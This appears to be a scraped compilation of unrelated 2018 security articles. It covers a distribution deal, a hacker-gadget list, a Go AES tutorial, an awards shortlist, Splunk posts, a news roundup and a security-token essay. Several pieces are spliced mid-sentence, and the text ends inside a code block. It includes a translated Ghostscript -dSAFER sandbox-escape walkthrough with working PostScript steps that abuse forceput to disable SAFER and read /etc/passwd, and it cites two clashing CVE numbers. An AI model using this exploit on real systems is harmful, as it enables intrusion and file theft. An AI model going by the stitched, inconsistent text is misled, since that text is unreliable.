
Ingram Micro China announces distribution agreement with Palo Alto Networks


On December 7, technology and supply-chain services provider Ingram Micro announced that it has reached a distribution agreement with network security company Palo Alto Networks to bring innovative, high business-value solutions to its broad base of Chinese customers.

Shao Yanming, CEO of Ingram Micro China, said: "Ingram Micro will draw on its internationally leading distribution management experience and professional management team to deliver better and broader solutions to Palo Alto Networks' contracted channel partners and professional resellers. This distribution agreement between Ingram Micro and Palo Alto Networks will further accelerate its go-to-market pace for network security solutions spanning cloud, network and mobile devices, providing security assurance for customers' digital transformation."

Chen Wenjun, Vice President for Greater China at Palo Alto Networks, said: "We are delighted to reach an agreement with Ingram Micro. Working with Ingram Micro will further expand Palo Alto Networks' nationwide channel coverage, including in emerging cities, with a focus on protecting the public cloud, private cloud and IoT sectors. At the same time, we will draw on our years of accumulated expertise in network security to continue cultivating and expanding this rapidly developing security market."


10 Gadgets Every Hacker Should Own


In this article I list 10 gadgets that every hacker should own. They make a great diversion when you are bored, or a birthday or Christmas gift for your white-hat friends. Of course, some of the items mentioned here may not suit every penetration tester. Wireless enthusiasts, for example, may be interested in the antenna below, which can capture keystrokes wirelessly, much like capturing WPA2 handshakes. Those interested in quadrotors may prefer the drones, which can fly 1-2 miles without losing signal and carry add-on hardware such as a Wi-Fi Pineapple or a Raspberry Pi.

1. Mousejack hacking

In 2016, researchers at the security company Bastille Networks found that the communication between most wireless mice and their receivers is unencrypted. This allows an attacker within about 100 meters to control a target computer without any physical access, pairing their own device with a target computer that uses a popular wireless keyboard dongle and injecting keystrokes remotely (shown below).



The attack is possible because the keyboard vendors (Logitech and Dell) either did not encrypt the data transmitted between the keyboard and the USB dongle or did not properly authenticate the device communicating with the dongle. Although the vulnerability was disclosed more than two years ago, over one billion devices worldwide are reportedly affected, so its impact will be hard to eliminate in the short term.

For more information about this attack, visit the official Bastille website for the list of affected devices and the technical details.

The "Crazyradio USB Dongle" used in these attacks is a 2.4 GHz bidirectional transceiver that can send and receive radio telemetry. Essentially, this USB dongle can be used to observe, record and inject radio traffic.

Crazyradio USB Dongle MSRP $44.99 (Amazon)

2. A GPU for password cracking

A graphics processing unit (GPU) is usually embedded in the internal graphics card connected to the computer's motherboard and handles image and game memory processing efficiently. You could say the GPU is responsible for all video and image rendering on our electronic devices.

Hackers can use GPU technology to build their own dedicated password-cracking rigs, which greatly shortens brute-force time and raises the success rate. Tokyoneon demonstrated the approach in his post "Hack 200 Online User Accounts in Less Than 2 Hours": using a GPU, he cracked hashes from a leaked password database and took over hundreds of Twitter, Facebook and Reddit accounts.

If you are considering a GPU for password cracking, I strongly recommend the GeForce GTX 1050 Ti. At only $189, it is an excellent entry-level GPU.

EVGA GeForce GTX 1050 Ti MSRP $219.99 (Amazon | Best Buy | EVGA | Walmart)

Of course, if you want your password-cracking rig to be more efficient and powerful, you can buy a GTX 1080 Ti or an RTX 2080 Ti (those of us on a budget will just watch from the sidelines).

EVGA GeForce GTX 1080 Ti $899.99 & up (Amazon)

3. The world's smallest laptop

The GPD Pocket is billed as "the world's smallest laptop". It packs an Intel Atom X7, a 1920 x 1080 display and 8 GB of RAM into a tiny laptop only slightly larger than most modern smartphones (shown below).

GPD Pocket MSRP $599 (Amazon | eBay | GPD | Walmart)

Its small size, physical keyboard, ability to handle demanding games, and an Intel CPU superior to that of Raspberry Pis and smartphones have made it increasingly popular.

Penetration testers can easily install a variety of Linux distributions on this device, including Ubuntu, Kali Linux and BlackArch, in place of the default Windows 10.

If you want a thinner, more fully featured GPD Pocket, you can get the newly released GPD Pocket 2, which is at most half as thick as the original GPD Pocket.

GPD Pocket 2 $799 (Amazon | GPD | Indiegogo)

4. The latest Raspberry Pi

The Raspberry Pi 3 Model B+, released this year, has a faster CPU, upgraded Wi-Fi and Ethernet modules, and can be powered over the Ethernet port (PoE HAT) without a traditional power adapter.

Plenty has already been posted about building a portable hacking device with a Raspberry Pi, so I won't go into detail here.

Raspberry Pi 3 B+ MSRP $35 (Amazon | Walmart) With power supply MSRP $47.95 (Amazon) With power supply and

Ghostscript: a -dSAFER sandbox escape based on CVE-2018-17961

Preface

Today I am analysing a new Ghostscript -dSAFER sandbox escape technique, which still works against every Ghostscript version currently in use. I don't know how long this vulnerability has existed, but I suspect it has been a very long time...



The exploit code provided in this article runs correctly on the last several releases. If you want to view it in evince, imagemagick, gimp or okular, you also need to add a line to ~/.bashrc, because nautilus will automatically invoke evince-thumbnailer without any user interaction. To trigger the vulnerability, you only need to browse a website after running the exploit code.

[emailprotected]:~$ convert exploit.jpg output.jpg
[emailprotected]:~$ tail -1 ~/.bashrc
echo pwned by postscript

Background

A core access-control feature of PostScript is its ability to mark the execution of executable code, which prevents users from peeking into the execution of system programs and obtaining more powerful access. For this I designed a complete exploit, which interested readers can download and test themselves [download link].

Once an error handler is installed in errordict, aborting an executing operator exposes the erroneous operator to the error handler. At that point errordict ignores the -dSAFER sandbox; this is the vulnerability exploited in this article, CVE-2018-17183.

Exploit details

Note that this vulnerability has not been fully fixed, because you can still invoke the error handler and trigger an error, or access the error handler saved in the internal state.

One exploitation method is to find an executing operator that can be aborted, trigger an exception, then invoke the error handler and abort it (which can be done via /stackoverflow or /execoverflow). When the failure occurs, the operand stack is left in an inconsistent state, because Ghostscript tries to set up the error handler but the setup is invalid.

Exploitation

First, fill the stack with junk data, leaving only a little room for the error handler:

GS>0 1 300368 {} for

Then make /switch_to_normal_marking_ops fail by changing pdfopdict to something that is not a dictionary:

GS<300369>/pdfopdict null def

Call /switch_to_normal_marking_ops (in the currently executing state):

GS<300369>GS_PDF_ProcSet /switch_to_normal_marking_ops get stopped

The operation fails with /typecheck when writing to pdfopdict:

GS<2>== true

Look at the last few elements of the saved stack:

GS<1>dup dup length 10 sub 10 getinterval ==
[300364 300365 300366 300367 300368 null /m {normal_m} --.forceput-- /typecheck]

As you can see, the erroneous operator is ready to be passed to the error handler.

forceput is a very powerful operator that ignores all access controls; we can extract it from the stack and use it to do whatever we want:

systemdict /SAFER false forceput
systemdict /userparams get /PermitFileControl [(*)] forceput
systemdict /userparams get /PermitFileWriting [(*)] forceput
systemdict /userparams get /PermitFileReading [(*)] forceput

Putting the above together, let's see how to read the contents of /etc/passwd; here is a demo:

$ gs -dSAFER -f test.ps
GPL Ghostscript GIT PRERELEASE 9.26 (2018-09-13)
Copyright (C) 2018 Artifex Software, Inc.  All rights reserved.
This software comes with NO WARRANTY: see the file PUBLIC for details.
(root:x:0:0:root:/root:/bin/bash)

Exploit code

Download: [download link]

* Source: mailclark; translated by FB editor Alpha_h4ck. Please credit CodeSec.Net when reposting.

The crypto/aes package in Go


AES is a symmetric encryption algorithm. This post only covers how to call the implementation already wrapped in Go's standard library; if you want to learn how the AES algorithm itself works, look elsewhere.

There are two operations: encryption and decryption.

const BlockSize = 16

Description: the byte length of an AES block (the unit of data encrypted at once).

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"errors"
	"fmt"
	"io"
	"log"
)

// padding appends PKCS#7 padding so the data is a whole number of blocks.
func padding(src []byte, blockSize int) []byte {
	padNum := blockSize - len(src)%blockSize
	pad := bytes.Repeat([]byte{byte(padNum)}, padNum)
	return append(src, pad...)
}

// unpadding removes PKCS#7 padding and rejects malformed padding instead of
// panicking or silently returning garbage.
func unpadding(src []byte) ([]byte, error) {
	n := len(src)
	if n == 0 {
		return nil, errors.New("empty input")
	}
	unPadNum := int(src[n-1])
	if unPadNum == 0 || unPadNum > aes.BlockSize || unPadNum > n {
		return nil, errors.New("invalid padding")
	}
	for _, b := range src[n-unPadNum:] {
		if int(b) != unPadNum {
			return nil, errors.New("invalid padding")
		}
	}
	return src[:n-unPadNum], nil
}

// encryptAES encrypts with AES in CBC mode. A fresh random IV is generated on
// every call and prepended to the ciphertext; reusing the key as the IV (as the
// original did) makes ciphertexts deterministic and must not be done.
func encryptAES(src []byte, key []byte) ([]byte, error) {
	block, err := aes.NewCipher(key) // key length (16/24/32) selects AES-128/192/256
	if err != nil {
		return nil, err
	}
	bs := block.BlockSize()
	padded := padding(append([]byte(nil), src...), bs) // copy: leave the caller's buffer alone
	out := make([]byte, bs+len(padded))
	iv := out[:bs]
	if _, err := io.ReadFull(rand.Reader, iv); err != nil {
		return nil, err
	}
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(out[bs:], padded)
	return out, nil
}

// decryptAES reverses encryptAES: reads the IV prefix, decrypts, then unpads.
// CBC provides confidentiality only; it does not detect tampering.
func decryptAES(src []byte, key []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	bs := block.BlockSize()
	if len(src) < 2*bs || len(src)%bs != 0 {
		return nil, errors.New("ciphertext length is not a multiple of the block size")
	}
	iv, body := src[:bs], src[bs:]
	plain := make([]byte, len(body))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(plain, body)
	return unpadding(plain)
}

func main() {
	d := []byte("hello,aes")
	key := []byte("hgfedcba87654321") // 16 bytes -> AES-128
	fmt.Println("before encryption:", string(d))
	x1, err := encryptAES(d, key)
	if err != nil {
		log.Fatalln(err)
	}
	fmt.Printf("after encryption: %x\n", x1) // raw bytes, so print them as hex
	x2, err := decryptAES(x1, key)
	if err != nil {
		log.Fatalln(err)
	}
	fmt.Println("after decryption:", string(x2))
}
```
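The CBC code above gives confidentiality only: anyone who can modify the ciphertext can flip plaintext bits or probe the padding check without being noticed. As an added example (not part of the original post), the same standard library offers AES-GCM, which authenticates the ciphertext and optional associated data; the key, message and "user=42" header below are constructed sample values.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"errors"
	"fmt"
	"io"
	"log"
)

// sealGCM encrypts and authenticates plaintext with AES-GCM. A fresh random
// 12-byte nonce is drawn for every call and prepended to the output; aad is
// authenticated but not encrypted (for example a record header or user id).
func sealGCM(key, plaintext, aad []byte) ([]byte, error) {
	block, err := aes.NewCipher(key) // key must be 16, 24 or 32 bytes
	if err != nil {
		return nil, err
	}
	gcm, err := cipher.NewGCM(block)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, gcm.NonceSize())
	if _, err := io.ReadFull(rand.Reader, nonce); err != nil {
		return nil, err
	}
	// Seal appends ciphertext||tag to the nonce slice, so the output is nonce||ct||tag.
	return gcm.Seal(nonce, nonce, plaintext, aad), nil
}

// openGCM reverses sealGCM. Any change to nonce, ciphertext, tag or aad makes
// Open return an error, and no plaintext is released in that case.
func openGCM(key, sealed, aad []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	gcm, err := cipher.NewGCM(block)
	if err != nil {
		return nil, err
	}
	if len(sealed) < gcm.NonceSize()+gcm.Overhead() {
		return nil, errors.New("sealed message too short")
	}
	nonce, ct := sealed[:gcm.NonceSize()], sealed[gcm.NonceSize():]
	return gcm.Open(nil, nonce, ct, aad)
}

// tamperDetected reports whether flipping one tag byte, or presenting a
// different aad, is rejected on decryption, i.e. whether integrity is enforced.
func tamperDetected(key, plaintext, aad []byte) (bool, error) {
	sealed, err := sealGCM(key, plaintext, aad)
	if err != nil {
		return false, err
	}
	flipped := append([]byte(nil), sealed...)
	flipped[len(flipped)-1] ^= 0x01 // corrupt the last byte of the tag
	_, errTag := openGCM(key, flipped, aad)
	_, errAAD := openGCM(key, sealed, []byte("other-context"))
	return errTag != nil && errAAD != nil, nil
}

func main() {
	key := []byte("0123456789abcdef0123456789abcdef") // 32 bytes -> AES-256 (constructed sample key)
	msg := []byte("hello,aes")
	aad := []byte("user=42")
	sealed, err := sealGCM(key, msg, aad)
	if err != nil {
		log.Fatalln(err)
	}
	fmt.Printf("sealed (nonce||ct||tag): %x\n", sealed)
	plain, err := openGCM(key, sealed, aad)
	if err != nil {
		log.Fatalln(err)
	}
	fmt.Println("opened:", string(plain))
	ok, _ := tamperDetected(key, msg, aad)
	fmt.Println("tampering detected:", ok)
}
```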

Golden Hat annual awards shortlist revealed: expert review, Outstanding Security Lab of the Year


In November 2018, the annual "Golden Hat" awards, guided by the First Research Institute of the Ministry of Public Security and hosted by 4hou (嘶吼) Media, officially launched. After the launch, many companies and organizations signed up enthusiastically. The awards have since entered the voting stage. Here, 4hou once again introduces the friends competing in this year's "Golden Hat" awards; today we present the candidates for Outstanding Security Lab of the Year.



Knownsec 404 Lab: Knownsec 404 Lab is Knownsec's core security research team, long devoted to vulnerability discovery and attack/defense research in Web, IoT, industrial control, blockchain, cloud security, mobile security and other fields, and enjoys a very high reputation in the industry. 404 Lab was the earliest team with global vulnerability risk awareness; it tracks and studies major global security incidents and high-risk vulnerabilities and delivers security capabilities. It has repeatedly submitted large numbers of vulnerability findings to well-known vendors at home and abroad, such as Microsoft, Apple, Adobe, Tencent, Alibaba and Baidu, assisted in fixing them and received many acknowledgements, making an important contribution to raising the industry's security level. The KCon hacker conference, the Sebug vulnerability community and the ZoomEye cyberspace search engine led by 404 Lab, known collectively as "KSZ", are the strongest guarantee of Knownsec's security products and services and the secret to keeping its technical strength at the international top level.



Huorong Security Lab: Huorong Security was founded in 2011 and has long focused on endpoint security, concentrating on engines and other underlying technology. Following an "intelligence-driven security" philosophy, it was the first to build a complete EDR (endpoint detection and response) operations system and is gradually leading the endpoint security field. Huorong Lab is mainly staffed by the anti-virus department; apart from products, its research results are presented as reports. The lab has published hundreds of professional reports interpreting malicious viruses and rogue software and exposing hacker groups and traffic fraud rings; the reports stress the nature and authenticity of events, strictly control the capture of data and evidence, and strive for accurate virus analysis. It has successfully helped Baidu and Tencent QQ discover and handle issues in their products.



Sangfor Qianlimu (千里目) Security Lab: The name Qianlimu comes from Wang Zhihuan's poem "Climbing Stork Tower" ("to see a thousand miles further, climb one more floor") and from a line attributed to Xunzi's "Encouraging Learning". Both mean that you must stand high to see far, that learning never ends, and that one must keep climbing. In network security attack and defense research, only constant effort and study improve technical skill and allow us to resist more unknown threats. We hope to be a pair of eyes in cyberspace with a sharper, longer view (Further eye), deeply perceiving unknown security threats and interpreting cutting-edge security technology.



Ant Financial Lightyear Security Lab: Formed at the end of 2016 (formerly the Buzz Lightyear Security Lab), this financial-payment security lab is made up of several senior security experts with rich experience fighting black- and grey-market fraud and top-tier offensive and defensive skills. Besides protecting Ant Financial's own products, it shares cutting-edge security technology to strengthen the security of partner merchants, vendors and ecosystem partners. Its core capabilities currently include vulnerability discovery and exploitation in mobile browsers, mobile OS vulnerability research, mobile app supply-chain vulnerability research, biometric security and IoT security. Over the past year the lab has presented influential research on several major domestic and international security stages and received acknowledgements from Google, Apple, Samsung and other vendors.



Future Security PwnMonkey Lab: PwnMonkey Security Lab focuses on cutting-edge offensive and defensive research in Internet and IoT security, with an outstanding security analysis team whose core members each have many years of security research experience. In its research areas the lab has repeatedly found major security risks, compiled them into risk reports for the relevant companies and departments, and prevented potential security problems in time.



360 Tianma & Tianxun Joint Lab (天马&天巡): This is the 360 team responsible for wireless security research. It explores and researches WLAN attack and defense technology, provides innovative and practical offensive and defensive techniques for WLAN security, and delivers complete wireless security solutions for a range of application scenarios. Since its founding the lab has obtained 6 invention patents and 3 design patents, accumulated extensive experience in big-data analysis, wireless threat detection and wireless attack/defense, had many research results accepted at BlackHat USA/Europe, DEFCON, HITB, CodeBlue, KCon and other well-known security conferences at home and abroad, and cooperated with the Third Research Institute of the Ministry of Public Security to establish China's first technical standard for Wi-Fi security. Building on its wireless offensive capabilities and enterprise network defense experience, the lab created China's first standalone wireless intrusion prevention system, Tianxun. In four years it has served more than 300 customers across industries with advanced wireless security solutions, making it the leading wireless security product brand in China.



Tencent Security Keen Lab: As a world-class information security team under Tencent, Keen Lab has more than ten years of accumulated research in desktop and mobile terminal security, with technical strength and research results at an internationally leading level; in recent years it has also achieved fruitful results in intelligent connected vehicle security, IoT security, and cloud computing and virtualization security. As more new ICT technologies come into public view, Keen Lab is actively building cutting-edge research capabilities in new dimensions such as the security of AI algorithms and frameworks, applications of machine learning to security research, and the security of blockchain applications. It also opens up its core technical capabilities, productized as cloud-based intelligent detection SaaS services, to the intelligent connected vehicle, Android app ecosystem and IoT industries, and has launched an information security solution for the intelligent connected vehicle industry based on real industry pain points and research. Safeguarding digital transformation across industries and protecting the information security of all users is Keen Lab's mission.



360Vulcan Team: The core technical staff of 360Vulcan Team are all world-leading senior information security experts, and the team's research focus is vulnerability discovery and exploitation, with deep accumulation and results in mainstream browsers, mainstream OS kernels, common software, virtualization software and blockchain software. The team has found hundreds of high-severity vulnerabilities in products from Microsoft, Google, Apple, Adobe, VMware and others and received public acknowledgements. Several members have been listed in Microsoft's MSRC Top 100 security researchers for many consecutive years, and in 2017 and 2018 a team member was the highest-ranked Chinese researcher on that list two years running. The team has repeatedly competed in well-known domestic and international hacking contests with excellent results: at Pwn2Own 2015/2016/2017, Mobile Pwn2Own 2017 and PwnFest 2016 it successfully compromised IE, Edge, Chrome, Safari, Adobe Reader, Adobe Flash, iPhone, Mac OS X, Windows 10, VMware Workstation and other targets, and won the Master of Pwn title at Pwn2Own 2017. In May 2018 the team found an epic-level security vulnerability in the EOS blockchain platform, valued in the tens of billions, and reported it to the vendor for a fix; the vulnerability allowed direct remote code execution and thus control of the entire EOS network. At the just-concluded Tianfu Cup cyber security contest the team successfully compromised Edge, Chrome, Adobe Reader, VMware Workstation, VirtualBox, Apple Safari, iPhone X (remote jailbreak), Office 365 and other targets, winning both the team and the individual championships.



Lingtian Lab: Lingtian Security Lab is Anbai Technology's professional technical team for offensive and defensive research in application security. Its core members come from the original WooYun founding team and well-known white hats from that community; the team is highly professional, technically advanced and experienced in practice. Founded in 2016, the lab has grown to 35 members, works steadily in application security, and is advancing toward becoming a top-tier offensive and defensive technology team in the industry.

DBAPPSecurity HatLab: HatLab belongs to the Security Research Institute of Hangzhou DBAPPSecurity Co., Ltd. and is a team focused on IoT security research. HatLab, meaning "Hack AnyThing", covers smart home security, connected vehicle security, smart healthcare security, industrial Internet security and more. Since its founding it has discovered serious vulnerabilities in many well-known domestic and international brands of cars, cameras, routers, smart gateways and smart door locks, assisted vendors in fixing them, and made an important contribution to a healthy and secure IoT environment.

Voting for all "Golden Hat" awards has begun. The results will be announced on the official website by December 30, and an awards ceremony in January 2019 will present trophies to all winners and their companies.

Note: the above are listed in no particular order.

Advancing Security Operations at Penn State University with Phantom Automation


The following is a guest blog post from Chris Decker, Enterprise Security Manager at Penn State University.

Consider information security at an organization that has 17,000 employees, 100,000 inhabitants, an airport, a power plant and a police force. You might think we're talking about protecting assets for a mid-size city or large corporation―that'd be a good guess. A large university; well, that might surprise a few people.

Large universities present their own unique information security challenges. In some ways, their size and scope are like a mid-size city; in other ways, they are even more complex. Universities have large, legacy administrative systems, cutting edge research, intellectual property and lots of sensitive data. In other words, they have valuable information assets. Now consider the fast, open networks, a diverse user base and decentralized IT support―along with the expectation of autonomy to support free-thinking. It can be easy to imagine the risks.


As you can imagine, threat detection in this environment and at this scale can be challenging. Penn State’s Office of Information Security is tasked with detecting threats in our environment, while not impeding the primary mission of the University.

Higher education resources are often limited and we have to work to make the most of available resources. A growing challenge in higher education information security is staffing a SOC with qualified, experienced personnel. Penn State is no different. In contrast, there seems to be an unlimited supply of adversaries operating in a 24x7 fashion. This creates significant workloads that can burn out or even overwhelm our analysts. It quickly became evident that we needed to turn to automation to supplement our analysts.

In the past, each analyst used their work experience to "duct tape" together a variety of Python, Perl and bash scripts, but that was very time consuming as systems and APIs changed, and it quickly became difficult to maintain. It also was a huge barrier for less experienced personnel who had no scripting or programming background. Finally, while we have "plays," occasionally a step would be overlooked or forgotten.

Earlier this year we purchased the Splunk Phantom platform to help address these problems.

The first challenge we threw at Phantom was to automate our Tier-1 phishing workflows. We receive more than 50 phishing reports daily, many of which are duplicates. A team of analysts pores through the submissions, takes appropriate action and then provides a tailored response to the submitter. This process is tedious, time consuming and frankly it ties up analysts whose time is better spent elsewhere.

With Phantom, this workflow is now automated. Previously-known threats are automatically triaged and a tailored response is sent back to the submitter with no human interaction required. All other submissions are sent to Phantom Playbooks to enrich the data so an analyst has all of the necessary information at their fingertips:

- Submitter information (department, title, priority, etc.) from Splunk
- URL reputation information from VirusTotal and Google Safe Browsing
- Screenshots and copies of the source code for each URL

If a response is necessary, Phantom runs a series of remediation playbooks to interact with our various security appliances, using the Phantom-provided "apps." This saves us from having to learn the various APIs and ensures consistency. Phantom also has a tight integration with Splunk Enterprise, allowing us to feed the results back to Splunk so we can use the power of SPL to aid in future detection efforts. The end result is then added back to Phantom so that related submissions are automatically triaged in the future.

Although it's early, Phantom is already freeing up analysts to work on tasks that a computer is not (yet) good at solving. If you find that your organization is also struggling to keep up, consider an automation platform. Phantom is the right tool for our needs.

Catch Chris talking more about his automation journey on the webcast "A Tale of Two SOCs: Regaining Control Using Automation."

Six Straight Years! Splunk Named a Leader in the Gartner SIEM Magic Quadrant


Gartner recently published the 2018 Magic Quadrant for Security Information and Event Management (SIEM), and Splunk was named a Leader for the sixth straight year. In the report, Gartner placed Splunk in the Leaders quadrant with the highest overall position in "Ability to Execute".

We are honored by this recognition, which reflects our customers' successes and our continued investment in innovative solutions that solve the security monitoring and threat detection use cases identified in the Magic Quadrant.


Splunk Security Portfolio

Our security portfolio helps customers realize their Nerve Center and address a wide range of security monitoring and threat detection use cases. Customers use Splunk Enterprise Security and Splunk User Behavior Analytics together as an analytics-driven SIEM to build their Security Operations Centers to detect, investigate and respond to threats. Splunk Phantom, the leading security orchestration, automation and response (SOAR) solution, helps customers investigate incidents and accelerate their response.



Splunk and partner apps, playbooks and analytic stories extend and simplify deployments by providing pre-packaged, ready-to-deploy content designed for specific use cases and data types.

Get Your Copy of the 2018 SIEM Magic Quadrant

Register for a complimentary copy of the 2018 Gartner Magic Quadrant for SIEM today!

Are you in a hurry to get started with your first SIEM or migrate away from your legacy SIEM? Learn how FINRA and REI use Splunk.

Contact us to find out how you can benefit from Splunk Security Solutions.

Girish Bhat

Director, Security Product Marketing

Splunk

@girishb

Disclaimer: Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner's research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

Attribution: Gartner, Magic Quadrant for Security Information and Event Management, Kelly Kavanagh, Toby Bussa, Gorka Sadowski, 3 December 2018



Posted by

Girish Bhat

Girish Bhat is the director of security product marketing at Splunk with responsibility for key security solutions, the Splunk CISO customer advisory board and customer use cases.

Previously, Girish held various roles managing authentication, compliance, VPN, advanced threats, DLP, IDS/IPS, mobile, SaaS, IaaS, virtualization and network monitoring solutions.

With more than 15 years of experience at startups and global brands, Girish's background includes product marketing, business strategy, strategic analysis, solutions marketing and product management for security, mobile, networking, cloud and software products.

Fun-time Friday - Data outages, Security Breaches and Brexit


It's been an interesting week here at gethynellis.com. We have been busy with a SQL Server version upgrade for a customer, the new solution combining Always On Availability Groups and merge replication. We have also been helping a customer with some on-premises SQL Server builds, creating a new pre-production environment. Fun times - it's good to know on-premises is still a thing. It's the news this week that has been most interesting.

O2 Data network meltdown 25 - 30 Million people affected

Thursday this week was an unusual and difficult day for users of the O2 phone network. It seems that in the early hours of Thursday morning something fundamental in the O2 network broke, meaning that some 25 million people (I have seen this quoted as being as high as 30 million, which includes other suppliers who utilise the O2 infrastructure) had no access to data on their phones. How did people cope? It's back up and running as of Friday morning. Software and a third-party supplier are being blamed, along with an expired certificate.

I did find this tweet particularly funny.



If it did nothing else, the O2 outage further highlighted how dependent people have become on their smartphones and on having internet access in particular. O2 have mentioned compensating customers for the outage; I haven't seen any details on how that will work, but it will be interesting to see how that materialises.

Marriott data breach

Affecting Starwood hotels... The following is an extract from an email I received from Marriott telling me about a Starwood hotels data breach. I have stayed in Marriott hotels on many occasions. I don't recall staying in a Starwood hotel, however the fact I'm getting this email must mean my details are in their databases... Worrying!

"On September 8, 2018 an alert was received from an internal security tool regarding an attempt to access the guest reservation database...Security experts were engaged to help determine what occurred. We learned during the investigation that there had been unauthorized access to the Starwood network since 2014. Marriott recently discovered that an unauthorized party had copied and encrypted information, and took steps towards removing it. On November 19, 2018, Marriott was able to decrypt the information and determined that the contents were from the Starwood guest reservation database.

The information includes some combination of name, mailing address, phone number, email address, passport number, Starwood Preferred Guest ("SPG") account information, date of birth, gender, arrival and departure information, reservation date, and communication preferences. For some, the information also includes payment card numbers and payment card expiration dates, but the payment card numbers were encrypted using Advanced Encryption Standard encryption (AES-128). There are two components needed to decrypt the payment card numbers, and at this point, Marriott has not been able to rule out the possibility that both were taken. For the remaining guests, the information was limited to name and sometimes other data such as mailing address, email address, or other information."

So someone has been rumbling around in this database for four years without anybody noticing, with access to a plethora of data including, in some cases, credit card information... Oh dear! I suspect this will not be the last we hear of this.

Brexit

You can't round up this week without mentioning Brexit. Let's not talk about politics for too long or we'll all get depressed, but it's been an interesting and possibly slightly worrying week as Theresa May attempts to sell "The Deal" to MPs. (It doesn't feel like a great deal to me.)

Every day in parliament this week has been the most important day in parliament's history since... well, the previous day. There is no doubt a long way to go before we get anywhere near a solution to the Brexit problem. Although if the "meaningful vote" is defeated on Tuesday next week, assuming the vote happens and is not delayed, we might be heading for a new Prime Minister or even another general election, all before Christmas.

Interesting times... I wonder what fun next week will bring.



A Few Thoughts on Security Tokens

As understood by an engineer with no background in economics, finance or trading

Júlio Santos

Our economy has evolved to consider and account for a variety of different assets: stocks, bonds, real estate, commodities, intellectual property, and many others. Trading some of these assets is constrained by their physicality, as it may be cumbersome to physically trade ownership, or even to subdivide the asset.



In order to help address this issue, we invented securitization. That’s the process of transforming ownership of an asset or a right into an easily tradable security. We predict that, with the emergence and maturity of blockchain technology, and the development of open standards, we will be enabled to expand on the concept and impact of securitization. We will do this through the tokenization of assets.

The digitization and standardization of securities trading has a long history already, but many of these systems remain walled gardens with no interoperability. They’re not open systems in which anyone, even with the right requirements, can participate at will. And they’re heavily intermediated by parties whose roles (providing trust and mitigating risk) could be made obsolete with the trustlessness, transparency and decentralized consensus of a blockchain system.

Now that we have the technological means to achieve it, tokenizing relatively illiquid assets and creating a market in which to trade these tokens is inevitable. Traditional, relatively illiquid assets stand to gain a substantial liquidity premium which, together with the slashing of fees due to disintermediation, represents an enormous market opportunity.

Advantages of securitytokens

Tokenized securities are disruptive to modern financial markets because of their disintermediation potential, global exposure, and programmatic operation. A few advantages of security tokens are:

- lower fees
- access to a global pool of capital
- faster settlements
- fractional ownership
- 24/7/365 markets
- increased liquidity
- no minimum investments
- automated compliance
- asset interoperability

All these combined should lead to a greater market efficiency, and the programmatic nature of these tokens will open the floodgates for new financial technology. Building a standardized protocol on top of which quants and other developers can dream up new financial products and services is paramount, as it truly enables innovation to accelerate in the space. Critically, this innovation would be permissionless, as it wouldn’t be limited to the R&D departments of the current large players in the financial space.

Standardization and interoperability

Standardization and interoperability are two crucial concepts in the movement for the opening up of financial markets.

Over the years the financial world has developed some standards, and it’s not a new idea. It would otherwise be impossible for your broker to hold shares in different companies using the same legal structure. Tokenization, however, enables us to take this concept to new heights by standardizing ownership in many different asset classes and making it possible for them to be held in the same wallet, used as collateral for loans, and straight up trading without the need for cash intermediation. I envision all asset classes to merge into a global pool of liquidity, interoperable through a common API.

Automated compliance

A great advantage of security tokenization is the potential for automated compliance. We’re experimenting with a token with embedded compliance: a compliance-native token if you will. This prevents the tokenized security from falling into the wrong hands, while maintaining disintermediation at the trading stage.

It's easy to conceive of a naive version of this technology. For those familiar with the ERC-20 standard, picture expanding on that contract with a restriction so that ownership transfers can only happen for addresses which have been registered as having undergone the proper level of financial due diligence (KYC/AML/CFT, capital markets regulations, investor accreditation).

These security tokens, with embedded compliance, should make the compliance process so seamless and auditable that I predict regulators will start demanding the tokenization of securities for these advantages alone. The enforcement of regulations will be that much simpler in this world. There's good reason to believe this will happen, as we've seen regulators demanding technology adoption in the past.

Regulation will, inevitably, have to evolve. Some countries regulate the form under which some ownership transfer has to take place, or demand a physical paper trail. We believe that competitive pressures brought about by pioneer local financial markets will push other regulators to embrace this new technology.

A sample technical draft

Embedded compliance

Picture, as described above, a token instantiation contract which requires buyers to have undergone some level of KYC. The buyer would have to submit themselves to a thorough registration by an identity provider, such as Fractal ID. Upon successful verification, Fractal ID could provide them with a cryptographically signed claim of such KYC verification, which they can use as an attestation for the token contract to prove their eligibility to buy. At that point, the contract will allow a sale, by allowing ownership in the tokens to be attributed to this buyer.

An interesting possibility of the mechanism devised above is that the token contract doesn’t need to know the identity of the buyer, only that they underwent a required level of KYC, provided the contract trusts Fractal’s claims.
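The mechanism in the two paragraphs above, as an added illustration that is not from the original post or from Fractal: a signed KYC claim, bound to an address and a verification level, is checked by the token before a transfer is credited. Go with ed25519 stands in for the smart contract and the identity provider; the Token type, KYCClaim layout, level numbers and addresses are all hypothetical.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"encoding/json"
	"errors"
	"fmt"
	"log"
	"time"
)

// KYCClaim is what the identity provider attests to. It carries no personal
// data: the token only learns the address and the verification tier reached.
type KYCClaim struct {
	Subject string `json:"subject"` // address the claim is bound to
	Level   int    `json:"level"`   // verification tier reached (hypothetical scale)
	Expires int64  `json:"expires"` // unix seconds; claims must be re-issued after this
}

// SignedClaim is the attestation the buyer presents to the token.
type SignedClaim struct {
	Claim     []byte // JSON-encoded KYCClaim, exactly as signed
	Signature []byte // ed25519 signature by the identity provider
}

// IssueClaim is the identity provider's side of the exchange.
func IssueClaim(priv ed25519.PrivateKey, c KYCClaim) (SignedClaim, error) {
	raw, err := json.Marshal(c)
	if err != nil {
		return SignedClaim{}, err
	}
	return SignedClaim{Claim: raw, Signature: ed25519.Sign(priv, raw)}, nil
}

// Token stands in for the compliance-native token contract.
type Token struct {
	trustedIssuer ed25519.PublicKey
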